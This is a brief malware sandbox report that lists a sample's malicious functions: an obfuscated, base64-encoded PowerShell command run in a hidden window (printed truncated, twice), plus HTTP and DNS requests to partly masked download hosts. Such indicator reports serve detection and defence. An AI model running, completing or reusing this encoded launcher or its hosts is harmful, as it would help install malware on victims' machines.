Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAATAB3AG4AcQBqAGMAdABiACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEUAcwB4AGQAbwByAHMAcwBlAGgAIAAjAD4AIAAkAFAAagBkAHkAcQBqAGsAeABwAGkAeQBmAD0AJwBDAGcAcABrA...
Network activity
TCP
HTTP GET requests
- http://wp.###hlearn.com/eabhhv3/wwEIXS/
UDP
- DNS ASK wp.###hlearn.com
- DNS ASK sn#######mes.000webhostapp.com
- DNS ASK at#######eba.000webhostapp.com
- DNS ASK lu#######ees2.000webhostapp.com
- DNS ASK 24##sr.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAATAB3AG4AcQBqAGMAdABiACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEUAcwB4AGQAbwByAHMAcwBlAGgAIAAjAD4AIAAkAFAAagBkAHkAcQBqAGsAeABwAGkAeQBmAD0AJwBDAGcAcABrA...' (with hidden window)
